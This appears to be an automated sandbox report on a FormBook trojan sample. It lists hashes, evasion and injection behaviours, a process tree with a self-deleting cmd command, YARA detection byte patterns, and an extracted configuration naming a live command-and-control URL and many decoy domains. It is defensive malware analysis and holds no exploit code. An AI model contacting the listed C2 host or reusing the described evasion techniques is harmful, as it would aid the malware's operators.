Play interactive tour

Edit tour

Analysis Report GiG35Rwmz6

Overview

General Information

Sample Name:	GiG35Rwmz6 (renamed file extension from none to exe)
Analysis ID:	432733
MD5:	b0901d0a6b90e6b371ba80e2c31ade52
SHA1:	2f175d971e4d6f4938083a78de9be10eb6ba0e05
SHA256:	08da4e7de40f2eec9cd1670e3db354d49d3101fd9ace7aaa5f99b235d2ce46ff
Tags:	exetrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

GiG35Rwmz6.exe (PID: 6564 cmdline: 'C:\Users\user\Desktop\GiG35Rwmz6.exe' MD5: B0901D0A6B90E6B371BA80E2C31ADE52)

GiG35Rwmz6.exe (PID: 6784 cmdline: C:\Users\user\Desktop\GiG35Rwmz6.exe MD5: B0901D0A6B90E6B371BA80E2C31ADE52)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

help.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)

cmd.exe (PID: 4564 cmdline: /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc3b80:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc3dfa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf03a0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf061a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcf91d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xfc13d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xcf409:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xfbc29:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xcfa1f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xfc23f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcfb97:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xfc3b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc4812:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf1032:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xce684:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xfaea4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc550b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf1d2b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xd578f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x101faf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xd6792:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd26b1:$sqlite3step: 68 34 1C 7B E1 0xd27c4:$sqlite3step: 68 34 1C 7B E1 0xfeed1:$sqlite3step: 68 34 1C 7B E1 0xfefe4:$sqlite3step: 68 34 1C 7B E1 0xd26e0:$sqlite3text: 68 38 2A 90 C5 0xd2805:$sqlite3text: 68 38 2A 90 C5 0xfef00:$sqlite3text: 68 38 2A 90 C5 0xff025:$sqlite3text: 68 38 2A 90 C5 0xd26f3:$sqlite3blob: 68 53 D8 7F 8C 0xd281b:$sqlite3blob: 68 53 D8 7F 8C 0xfef13:$sqlite3blob: 68 53 D8 7F 8C 0xff03b:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: GiG35Rwmz6.exe PID: 6564	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.GiG35Rwmz6.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.GiG35Rwmz6.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.GiG35Rwmz6.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
4.2.GiG35Rwmz6.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.GiG35Rwmz6.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.GiG35Rwmz6.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
4.0.GiG35Rwmz6.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.GiG35Rwmz6.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.GiG35Rwmz6.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
4.2.GiG35Rwmz6.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.GiG35Rwmz6.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.GiG35Rwmz6.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc3230:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc34aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xefa50:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xefcca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcefcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xfb7ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xceab9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xfb2d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xcf0cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xfb8ef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcf247:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xfba67:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc3ec2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf06e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xcdd34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xfa554:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc4bbb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf13db:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xd4e3f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10165f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xd5e42:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd1d61:$sqlite3step: 68 34 1C 7B E1 0xd1e74:$sqlite3step: 68 34 1C 7B E1 0xfe581:$sqlite3step: 68 34 1C 7B E1 0xfe694:$sqlite3step: 68 34 1C 7B E1 0xd1d90:$sqlite3text: 68 38 2A 90 C5 0xd1eb5:$sqlite3text: 68 38 2A 90 C5 0xfe5b0:$sqlite3text: 68 38 2A 90 C5 0xfe6d5:$sqlite3text: 68 38 2A 90 C5 0xd1da3:$sqlite3blob: 68 53 D8 7F 8C 0xd1ecb:$sqlite3blob: 68 53 D8 7F 8C 0xfe5c3:$sqlite3blob: 68 53 D8 7F 8C 0xfe6eb:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 10 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: GiG35Rwmz6.exe

Avira: detected

Found malware configuration

Show sources

Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: GiG35Rwmz6.exe	Virustotal: Detection: 40%			Perma Link
Source: GiG35Rwmz6.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: GiG35Rwmz6.exe

Joe Sandbox ML: detected

Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Unpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack

Source: GiG35Rwmz6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: GiG35Rwmz6.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp
